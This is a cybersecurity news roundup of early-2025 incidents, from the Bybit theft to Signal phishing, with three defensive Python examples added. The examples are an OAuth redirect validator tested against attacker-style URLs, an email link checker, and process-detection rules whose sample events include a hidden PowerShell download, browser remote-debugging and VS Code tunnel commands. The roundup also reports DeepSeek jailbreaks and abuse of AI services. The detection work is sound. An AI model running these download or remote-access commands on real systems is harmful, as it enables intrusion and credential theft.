North Korea stages Bybit hack
The $1.5 billion theft is the largest crypto heist in history
A roundup of some of the noteworthy developments in the cybersecurity landscape, encompassing the latest vulnerability discoveries and emerging attack trends. Here are this edition’s top stories -
↘️ The North Korean Lazarus Group has been linked to a “sophisticated” attack that led to the theft of more than $1.5 billion worth of cryptocurrency from one of Bybit’s cold wallets, making it the largest single crypto heist in history. Bybit said it detected unauthorized activity within one of its Ethereum (ETH) cold wallets during a planned routine transfer on February 21, 2025, at around 12:30 p.m. UTC. The theft dwarfs the previous records set by Ronin Network ($624 million), Poly Network ($611 million), and BNB Bridge ($586 million). The attack has been attributed to a cluster dubbed TraderTraitor. [The Hacker News]
↘️ DeepSeek’s AI platform, which skyrocketed to prominence with its reasoning model R1, has been at the receiving end of scrutiny, with multiple analyses finding ways to jailbreak its system and produce malicious or prohibited content. The findings add to a growing body of evidence that its safety protections don’t match up to those of established competitors like OpenAI and Google. An audit by NewsGuard has further found its chatbot to be a “disinformation machine,” advancing China’s position 60% of the time in response to prompts about Chinese, Russian, and Iranian false claims. In what appears to be an interesting discovery, DeepSeek's model has also suggested that it may have received knowledge from OpenAI models, a claim that OpenAI — which trained its models on unlicensed, copyrighted data from around the web — had made. The Chinese AI company has had a whirlwind ride since it released its chatbot app on January 10, triggering panic on Wall Street and shaving more than $600 billion off chipmaker NVIDIA’s market value — the largest single-day decline for any company in market history. [WIRED / The Hacker News]

↘️ Malicious actors are advertising a new tool named Devil-Traff that claims to offer the ability to send bulk SMS messages that fuel phishing campaigns. “These bulk SMS services use features like sender ID spoofing and automated messaging to impersonate trusted sources, enabling attackers to deliver thousands of fake messages in minutes,” SlashNext said. [SlashNext]
↘️ A vulnerability discovered in an unnamed online provider of travel services for hotels and car rentals could have exposed millions of airline customers to potential account takeovers due to a misconfiguration in the OAuth authentication process. The flaw essentially gave attackers a way to redirect a user’s OAuth credentials to a server of their choice, allowing them to obtain a valid session token from an airline’s website and use it to log into the travel company’s systems as the victim. The unauthorized access could have allowed them to book hotels and car rentals using airline loyalty points. The authentication flow goes like this: when a user clicks the login button on the travel company’s site, they are redirected to an airline’s login page for authentication. Once that completes, the airline site sends an access token back to the travel company site, which then uses it to request user data from the airline site. The issue is that the company did not correctly verify that the sensitive authentication credentials were being sent to a valid domain, meaning the token could be redirected to an arbitrary site instead of the travel company. An attacker could exploit this issue simply by sending a malicious link to prospective targets. OAuth vulnerabilities of this kind are common in the wild, with similar account takeover bugs found in Booking.com, Expo, Grammarly, Vidio, and Bukalapak. [The Hacker News]
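The weak point described above is the redirect-target check. The following Python is an added illustration, not code from the article or from the affected travel company: it places a check that merely looks for the trusted domain somewhere in the URL next to a strict allowlist comparison, and runs both over a set of constructed candidate URLs (the hostnames, the registered callback and the `authorize` helper are all assumptions made for the example).

```python
"""Redirect URI validation in an OAuth flow: weak check versus strict allowlist.

Added illustration; this is not code from the article or from the affected
travel company. The hostnames and registered redirect URI are constructed.
"""
from urllib.parse import urlsplit

# The redirect URIs the travel site registered with the airline's
# authorization server (constructed sample value).
REGISTERED_REDIRECTS = {"https://travel.example/oauth/callback"}


def weak_is_allowed(redirect_uri: str) -> bool:
    """The kind of check the article describes failing: it only confirms that
    the trusted domain appears somewhere in the URL, so attacker-controlled
    addresses that embed that string pass too."""
    return "travel.example" in redirect_uri


def strict_is_allowed(redirect_uri: str) -> bool:
    """Exact match against the registered allowlist.

    The candidate is parsed so that userinfo tricks (https://trusted@evil),
    lookalike subdomains, downgraded schemes, fragments and query strings
    are all rejected; only scheme, host, port and path are compared."""
    try:
        parts = urlsplit(redirect_uri)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme != "https" or parts.username or parts.password:
        return False
    if parts.query or parts.fragment or not parts.hostname:
        return False
    normalised = f"https://{parts.hostname}"
    if port and port != 443:
        normalised += f":{port}"
    normalised += parts.path or "/"
    return normalised in REGISTERED_REDIRECTS


def authorize(redirect_uri: str, token: str, check=strict_is_allowed):
    """Model of the authorization server's final step (hypothetical helper):
    the token is only released to a redirect target that passes the check."""
    if not check(redirect_uri):
        return None
    return f"{redirect_uri}#access_token={token}"


# Constructed candidates: the first is the legitimate callback, the rest are
# shapes an attacker-supplied link could take against a weak check.
CANDIDATES = [
    "https://travel.example/oauth/callback",
    "https://travel.example.attacker.example/oauth/callback",
    "https://attacker.example/collect?next=travel.example",
    "https://travel.example@attacker.example/oauth/callback",
    "http://travel.example/oauth/callback",
    "https://travel.example/oauth/callback/../../open-redirect",
]


def compare_checks(candidates=CANDIDATES) -> dict:
    """Return {uri: (weak_result, strict_result)} for each candidate."""
    return {uri: (weak_is_allowed(uri), strict_is_allowed(uri)) for uri in candidates}


if __name__ == "__main__":
    for uri, (weak, strict) in compare_checks().items():
        print(f"weak={weak!s:5} strict={strict!s:5} {uri}")
```

Every candidate passes the weak check; only the first passes the strict one. The design point is that the allowlist is compared after parsing and normalising, never with substring or prefix matching on the raw string.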
↘️ Ransomware victims’ extortion payments totaled $814 million in 2024, a drop of 35% compared to the record $1.25 billion that hackers extracted from ransomware victims the previous year. The decline is attributed to the growing law enforcement success in dismantling ransomware gangs like LockBit and BlackCat, as well as heightened global awareness about the threat of ransomware, leading to more mature defenses and response plans within governments and other institutions. The vacuum left behind by major players has been filled by newer lone wolf actors who often seek smaller ransom payments. [WIRED / The Hacker News]
↘️ The threat actor known as GreenSpot has been observed targeting 163.com, a free email service operated by NetEase, to facilitate credential theft operations. The group is believed to operate from Taiwan and has been active since at least 2007. It primarily targets government, academic, and military-related entities in China through phishing campaigns. [Hunt.io]
↘️ The Turkish government has proposed a controversial new cybersecurity law that could make it a criminal act to report on data breaches. “Those who carry out activities aimed at targeting institutions or individuals by creating the perception that there has been a data breach in cyberspace, even though there has been no data breach, shall be sentenced to imprisonment for a term of two to five years,” the legislation states. Concerns have been raised that such a law may discourage people from reporting any potential data leaks. [Turkish Minute]
↘️ A subgroup within the notorious Russian state-backed hacking outfit known as Sandworm has been running a multi-year campaign to gain initial access to organizations across the world and hand off that access to other hackers within Sandworm’s larger organization, the GRU military intelligence agency. Active since at least late 2021, the attacks are both opportunistic and targeted, using “spray and pray” attacks against internet-facing infrastructure to obtain initial access and conducting significant post-compromise activity in select targets that are strategically significant to Russia. [WIRED / The Hacker News]
↘️ Attackers are now leveraging video attachments in multimedia messages (MMS) on mobile devices to promote Bitcoin scams that lure recipients to WhatsApp investment-related groups, where scammers use high-pressure tactics to extract money or personal information. The video-based abuse has been codenamed VidSpam. “These scams often feature images of successful-looking individuals, fake awards, and promises of extraordinary daily profits,“ Proofpoint said. “Their sole goal: to convince recipients to part with their hard-earned money.“ [Proofpoint]
↘️ In recent years, there has been a trend of North Korean IT workers infiltrating international companies by securing remote positions under false identities. The rise of remote work has provided new opportunities for North Korean IT workers to gain employment in global companies, often using fraudulent profiles and front companies. This tactic not only violates international sanctions but also poses significant cybersecurity risks, including data theft and the installation of backdoors on compromised systems. North Korea has adapted to tightened sanctions by escalating its criminal activities. According to Recorded Future, at least three organizations in the broader cryptocurrency space, a market-making company, an online casino, and a software development company, were targeted as part of the Contagious Interview campaign between October and November 2024. Both activities are attributed to a cluster referred to as CL-STA-0240, Famous Chollima, PurpleBravo, and Tenacious Pungsan. [The Hacker News]
↘️ Russian state-aligned threat actors are ramping up efforts to spy on Ukrainian military and government officials via their secure messaging applications, including Signal Messenger and WhatsApp, by using bogus group chat invites that trick them into linking their accounts with a Signal device under the attackers’ control by abusing the device linking functionality. In doing so, future messages get delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim’s secure conversations without the need for full-device compromise. Furthermore, Russian soldiers have also been conscripted to “link Signal accounts on devices captured on the battlefield back to actor-controlled infrastructure for follow-on exploitation,” Google said. Signal has released additional protections against such phishing efforts. It’s worth noting that the threat of such attacks is even greater now since Signal recently added the ability to synchronize chat history for the past 45 days between old and newly linked devices. While these efforts are currently limited to personnel of interest to Russian intelligence agencies, the tactics the threat actors are using could very well serve as a blueprint for other groups to follow suit in broader attacks on other messaging apps. [WIRED / The Hacker News]
↘️ The Chinese state-sponsored hacking group Salt Typhoon successfully broke into U.S. telecom networks via old, unpatched vulnerabilities (CVE-2018-0171) and stolen login credentials as part of a long-term sophisticated campaign. The hallmark of the campaign is the extensive use of living-off-the-land (LotL) tactics, piggybacking on built-in networking features rather than deploying traditional malware, to execute commands stealthily and deploy added malware like JumbledPath to impair detection efforts. The group then moved laterally within compromised networks and between different telecom providers, using compromised devices as stepping stones to reach other targets and avoid detection. It's also said to have repeatedly cleared relevant logs to obfuscate its activities. [The Hacker News]
↘️ New research has found that it’s possible for attackers to bypass Microsoft Outlook’s spam filters and distribute malicious ISO files through emails without being quarantined, by embedding a malicious URL under a benign-looking link. This hyperlink obfuscation trick, which hides the true destination of the link, is enough to land the emails in the inbox. “This vulnerability significantly reduces the effectiveness of Outlook’s spam filtering mechanism, allowing attackers to bypass security measures and distribute malicious files,” Afine said. Previously, it was also demonstrated that attackers could bypass Microsoft Defender SmartScreen using ISO files, thereby allowing malicious executables extracted from the disk image to be run without triggering any security warnings. [Afine]
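A mail gateway or mailbox rule can catch the trick described above by comparing the host a reader sees in the link text with the host the `href` actually points at. The following Python is an added example and is not code from Afine’s research or from Microsoft; the message body, hostnames and the list of disk-image extensions are constructed for the illustration.

```python
"""Flag e-mail links whose visible text disagrees with their real target.

Added example; it is not code from Afine's research or from Microsoft.
It parses the anchors of an HTML message body, and for every anchor whose
visible text is itself a URL, compares the host the reader sees with the
host in the href. It also flags links that deliver disk-image files such
as ISO. The message body is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Container formats that Windows mounts on double-click; the article
# describes ISO specifically. (Extension list is an assumption.)
RISKY_EXTENSIONS = (".iso", ".img", ".vhd", ".vhdx")


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def shown_host(text: str):
    """Host named by the visible link text, or None if the text is not a URL."""
    t = text.strip()
    if t.lower().startswith("www."):
        t = "https://" + t
    if not t.lower().startswith(("http://", "https://")):
        return None
    return (urlsplit(t).hostname or "").lower()


def analyse_links(html: str) -> list:
    """Return one finding per suspicious anchor, with the reasons."""
    parser = AnchorCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.anchors:
        reasons = []
        target = urlsplit(href)
        real_host = (target.hostname or "").lower()
        displayed = shown_host(text)
        if displayed is not None and displayed != real_host:
            reasons.append(f"text shows {displayed} but link goes to {real_host}")
        if target.path.lower().endswith(RISKY_EXTENSIONS):
            reasons.append(f"link delivers a disk image: {target.path.rsplit('/', 1)[-1]}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed message: one disguised ISO link, one honest link, one plain
# text link (no URL in the text to compare against).
SAMPLE_EMAIL = """<html><body>
<p>Your quarterly report is ready.</p>
<p><a href="https://cdn.attacker-example.net/dl/report.iso">https://docs.trusted-example.com/report.pdf</a></p>
<p><a href="https://docs.trusted-example.com/help">https://docs.trusted-example.com/help</a></p>
<p><a href="https://cdn.attacker-example.net/unsubscribe">Unsubscribe</a></p>
</body></html>"""

if __name__ == "__main__":
    for finding in analyse_links(SAMPLE_EMAIL):
        print(finding["href"], "<-", finding["text"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

Only the first anchor is reported, on both counts: its text names one host while the link resolves to another, and the target is an ISO. Plain-text anchors such as “Unsubscribe” are not compared, since there is no displayed host to check; hostnames are compared exactly rather than by registrable domain so that lookalike subdomains are not waved through.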
↘️ The threat actor known as Hive0137 has been linked to an email spamming campaign distributing malware like DarkGate, NetSupport, and a new loader dubbed T34-Loader used for initial access in ransomware attacks. The threat cluster, which overlaps with TA571, is said to leverage large language models (LLMs) to assist in script development, as well as to create authentic and unique phishing emails. “In a December 2023 campaign, Hive0137 made use of Snow crypter to inject the new T34-Loader. Of note, the Snow crypter was developed by former members of the Trickbot/Conti syndicate (aka ITG23), suggesting a relationship between threat actors for developing or using T34-Loader and ITG23,” IBM X-Force said. ITG23 is the name given to the Conti/TrickBot group. [IBM X-Force]
↘️ A global cryptocurrency affiliate network dubbed CryptoGrab has been defrauding users of millions for more than five years using phishing emails and other tactics. The malicious activity mimics legitimate crypto platforms and uses a structured affiliate program, enabling cybercriminals to exploit users across multiple blockchain networks through drainer tools that can automatically extract funds from targets’ wallets using a variety of obfuscation and anti-detection techniques. “CryptoGrab’s phishing campaigns are designed to trick users into entering sensitive information like private keys, seed phrases, or wallet passwords,” Abnormal Security said. “These sites often mimic legitimate cryptocurrency services, making it difficult for users to differentiate between genuine and fake platforms. Once targets provide their wallet details, CryptoGrab’s drainer tools immediately withdraw funds.” In a related development, a security researcher who goes by the name Tim found hundreds of bogus GitHub repositories advertising cracked software and game mods that trick users into installing a variant of the Redox stealer malware. [Abnormal Security]
↘️ A serious security vulnerability found in popular stalkerware apps like Cocospy and Spyic is exposing the sensitive personal information and communications of millions of people, including email addresses, messages, photos, and call logs. The services claim to have almost 1.8 million and 875,000 registered users, respectively. Both apps have been linked to a Chinese mobile app developer named 711.icu. A similar flaw has also been unearthed in another phone surveillance tool called Spyzie that has compromised more than half a million Android devices and at least 4,900 iPhones and iPads. The bug essentially allows anyone to access the phone data, including messages, photos, and location data, as well as the email address used to sign up for the service. The flaw remains unpatched in all three apps. [TechCrunch]
↘️ The China-backed cyber-espionage group known as “Silk Typhoon” has begun targeting organizations in the IT supply chain to gain access to their downstream customers, marking a troubling shift in the threat group's tactics, as it exploits trusted relationships to bypass security defenses. Silk Typhoon has shown considerable proficiency in exploiting zero-day vulnerabilities in many of its attacks. The threat actor uses multiple avenues to exfiltrate data after initial compromise. Prominent among them are lateral movement from on-premises to cloud, routing data through compromised hardware devices and appliances, use of covert networks to obfuscate its activity, and living-off-the-land techniques that use the existing built-in tools and services within the compromised environment. The threat group’s technical prowess, displayed by its ability to pivot quickly and exploit vulnerabilities with efficiency, gives it “one of the largest targeting footprints among Chinese threat actors,” Microsoft said. [The Hacker News]
↘️ Apple has removed its Advanced Data Protection (ADP) feature for iCloud from the United Kingdom with immediate effect following government demands for backdoor access to encrypted user data. “We are gravely disappointed that the protections provided by ADP will not be available to our customers in the U.K. given the continuing rise of data breaches and other threats to customer privacy,” the company said. “ADP protects iCloud data with end-to-end encryption, which means the data can only be decrypted by the user who owns it, and only on their trusted devices.” Similar proposals for access to encrypted data have been made in Sweden. [The Hacker News]
↘️ A 23-year-old Serbian youth activist had their Android phone targeted by a zero-day exploit chain developed by Cellebrite to unlock the device and likely deploy an Android spyware called NoviSpy. The flaws combined CVE-2024-53104 with CVE-2024-53197 and CVE-2024-50302 to escalate privileges and achieve code execution. The vulnerabilities, originally present within the Linux kernel, were addressed in December 2024. CVE-2024-53104 and CVE-2024-50302 have since been addressed in Android as of early March 2025. In response to the development, Cellebrite said it will no longer allow Serbia to use its software, stating “we found it appropriate to stop the use of our products by the relevant customers at this time.” [The Hacker News]
↘️ Microsoft revealed the identities of four individuals who it said were behind an Azure Abuse Enterprise scheme that involves leveraging unauthorized access to generative artificial intelligence (GenAI) services in order to produce offensive and harmful content. The campaign, also referred to as LLMjacking, has targeted various AI service providers, with the threat actors selling the access to other criminal actors to facilitate the illicit generation of non-consensual intimate images of celebrities and other sexually explicit content in violation of its policies. [The Hacker News]
↘️ Cybersecurity researchers have flagged an active phishing campaign that’s targeting high-profile X accounts in an attempt to hijack and exploit them for fraudulent activity. “This campaign has been observed targeting a variety of individual and organization accounts such as U.S. political figures, leading international journalists, an X employee, large technology organizations, cryptocurrency organizations, and owners of valuable, short usernames,” SentinelOne said. In this campaign, users are sent bogus email messages that mimic copyright violation and suspicious login themes to trick users into clicking on a fake URL seeking X account credentials. “Once an account is taken over, the attacker swiftly locks out the legitimate owner and begins posting fraudulent cryptocurrency opportunities or links to external sites designed to lure additional targets, often with a crypto theft-related theme,” the company said. The activity has not been attributed to a specific country or any widely-tracked threat actor. [SentinelOne]
↘️ Retailers are hiring “intermediary firms” to algorithmically tweak their prices for the same products, a technique known as surveillance pricing. “Instead of a price or promotion being a static feature of a product, the same product could have a different price or promotion based on a variety of inputs—including consumer-related data and their behaviors and preferences, the location, time, and channels by which a consumer buys the product,” the U.S. Federal Trade Commission (FTC) said. This includes details like a person’s precise location or browser history, and even behaviors ranging from mouse movements on a web page to the type of products that consumers leave unpurchased in an online shopping cart. The disclosure comes in the aftermath of a report from 404 Media that found location-tracking company Fog Data Science, which sells its services to police departments, to be apparently using addresses and coordinates of doctors' and lawyers' offices and other types of locations to help law enforcement compile lists of places visited by suspects. [FTC]
↘️ The threat actor known as SideWinder has expanded its targeting beyond its usual sectors and widened the geographical scope of its operations to include maritime and logistics organizations, as well as entities in the nuclear energy sector. The attacks involve the use of spear-phishing lures to deploy a post-exploitation toolkit named StealerBot that's capable of executing a wide range of malicious actions, including installing additional malware, capturing screenshots and logging keystrokes on compromised systems, swiping passwords, grabbing remote desktop login information, stealing files, and escalating privileges. [The Hacker News]
↘️ The U.S. Department of Justice (DoJ) announced charges against 12 Chinese nationals for their alleged participation in a wide-ranging scheme designed to steal data and suppress free speech and dissent across the world. The defendants include eight staffers for the contractor i-Soon, two officials at China's Ministry of Public Security who allegedly worked with them, and two other alleged hackers who are said to be part of the Chinese hacker group APT27 (aka Silk Typhoon). “These malicious cyber actors, acting as freelancers or as employees of i-Soon, conducted computer intrusions at the direction of the PRC’s MPS and Ministry of State Security (MSS) and on their own initiative,” the DoJ said. “The MPS and MSS paid handsomely for stolen data.” [WIRED / The Hacker News]
↘️ A new campaign dubbed Phantom Goblin is leveraging social engineering tactics to deliver information stealing malware that collects a wide range of browser-related data, including browsing history, visited websites, login credentials, tracking data, session details, cookies, downloaded files, form inputs, personalization settings, and installed extensions. The malware strain is distributed via RAR archives containing a malicious LNK file disguised as a PDF document. Once executed, the LNK file uses PowerShell to download and execute malicious payloads from a GitHub repository. “The malware extracts browser cookies by enabling remote debugging, bypassing Chrome’s App Bound Encryption (ABE) for stealthy data exfiltration,” Cyble said. “A malicious binary establishes a Visual Studio Code (VSCode) tunnel, allowing TA to maintain unauthorized remote access while evading detection. Another payload collects browsing history, login credentials, session details, and other sensitive browser-related information before exfiltrating it to a Telegram channel.” The collected information is archived and transmitted to an attacker-controlled Telegram bot. [Cyble]
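The three behaviours in the report above (a shortcut launching hidden PowerShell that downloads from a repository, a browser started with remote debugging enabled, and a VS Code tunnel) all show up in process-creation telemetry. The following Python is an added example, not code from Cyble’s report or from any EDR product: it runs three small rules over constructed process events. The event field names (`parent`, `image`, `cmd`), the assumption that the VS Code CLI appears as `code.exe`, and all paths and URLs in the sample are assumptions made for the illustration.

```python
"""Process-creation detections for the three behaviours described above:
a shortcut launching hidden PowerShell that downloads from the web, a
Chromium browser started with remote debugging, and a VS Code tunnel.

Added example; not code from Cyble's report or from any EDR product. The
event records are constructed, and the field names (parent, image, cmd)
are an assumption about how your telemetry is shaped."""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring",
                    "downloadfile", "start-bitstransfer")
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden")  # -w, -win, -windowstyle, ...


def rule_hidden_powershell_download(ev):
    """Hidden PowerShell that fetches content; explorer.exe as parent is what
    a double-clicked LNK typically looks like."""
    if ev["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = ev["cmd"].lower()
    if HIDDEN_WINDOW.search(cmd) and any(m in cmd for m in DOWNLOAD_MARKERS):
        via = "shortcut or explorer" if ev["parent"].lower() == "explorer.exe" else ev["parent"]
        return f"hidden PowerShell download launched via {via}"
    return None


def rule_browser_remote_debugging(ev):
    """Browser started with the DevTools remote-debugging switch, which lets
    a local client read cookies regardless of App Bound Encryption."""
    if ev["image"].lower() in BROWSERS and "--remote-debugging-" in ev["cmd"].lower():
        return "browser launched with remote debugging enabled"
    return None


def rule_vscode_tunnel(ev):
    """`code tunnel` opens an outbound remote-access channel (binary name assumed)."""
    if ev["image"].lower() == "code.exe" and re.search(r"code\.exe\s+tunnel\b", ev["cmd"].lower()):
        return "VS Code tunnel started"
    return None


RULES = (rule_hidden_powershell_download, rule_browser_remote_debugging, rule_vscode_tunnel)


def detect(events):
    """Run every rule over every event; return alerts as (index, reason)."""
    alerts = []
    for i, ev in enumerate(events):
        for rule in RULES:
            reason = rule(ev)
            if reason:
                alerts.append((i, reason))
    return alerts


# Constructed sample telemetry (paths and URLs are placeholders).
EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": r'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest https://raw.githubusercontent.com/constructed-org/constructed-repo/main/update.bin -OutFile $env:TEMP\update.bin"'},
    {"parent": "powershell.exe", "image": "chrome.exe",
     "cmd": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222'},
    {"parent": "explorer.exe", "image": "chrome.exe",
     "cmd": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
    {"parent": "cmd.exe", "image": "code.exe",
     "cmd": r"code.exe tunnel --accept-server-license-terms --name ws01"},
    {"parent": "explorer.exe", "image": "code.exe",
     "cmd": r"code.exe C:\Projects\tunnel-app"},
]

if __name__ == "__main__":
    for index, reason in detect(EVENTS):
        print(f"[{index}] {reason}: {EVENTS[index]['cmd']}")
```

Events 1, 2 and 4 fire; the benign PowerShell script run, the normal browser start and the ordinary `code.exe <folder>` launch do not. Each rule keys on the combination the report describes rather than on PowerShell or the browser alone, which keeps the noise down on developer and administrator workstations.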
↘️ New warnings have been issued about the persistent nature of SIM swapping attacks, which allow fraudsters to submit a request to telecom providers by posing as the victim and port out their SIM to another one that’s under their control. Techniques like phishing and social engineering are used to acquire sensitive information about the victim, such as their national ID, phone number, and card details, prior to launching the attack. “In some regions, this process is safeguarded by a Government E-Verification Platform, which requires users to verify their identity before any SIM swap or port-out request is approved,” Group-IB said. “Verification methods may include approving a login request or using biometric authentication. To bypass these safeguards, fraudsters deceive victims into approving the verification request, often by posing as representatives of legitimate services — such as job applications or account updates.” Once threat actors gain control of a victim’s SIM, it’s used to conduct unauthorized transactions and hijack online accounts that are secured by SMS-based two-factor authentication. [Group-IB]
↘️ Cybersecurity researchers have detailed a Business Email Compromise (BEC) attack in which a threat actor took advantage of a compromised email server associated with one of the parties to send fraudulent emails and steal funds. "This B2B BEC scheme involved abusing the implicit trust between relationships amongst business partners, patiently weaved by the threat actor within days," Trend Micro said. [Trend Micro]